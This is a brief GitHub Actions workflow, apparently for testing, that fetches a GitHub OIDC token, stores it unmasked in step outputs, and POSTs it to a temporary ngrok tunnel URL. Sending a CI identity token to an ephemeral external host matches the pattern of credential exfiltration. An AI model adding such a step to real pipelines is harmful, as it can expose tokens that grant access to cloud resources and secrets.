name: Token Validation

on:
  workflow_dispatch:

permissions:
  id-token: write

jobs:
  test:
    runs-on: ubuntu-latest

    steps:
      - name: Get GitHub OIDC token
        id: oidc
        run: |
          TOKEN=$(curl -s \
            -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
            "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=secrets-vault" \
            | jq -r '.value')

          echo "token=$TOKEN" >> "$GITHUB_OUTPUT"

      - name: Authenticate with Secrets Vault
        env:
          OIDC_TOKEN: ${{ steps.oidc.outputs.token }}
        run: |
          curl -X POST \
            -H "Authorization: Bearer $OIDC_TOKEN" \
            https://f28f-86-149-79-251.ngrok-free.app/github/auth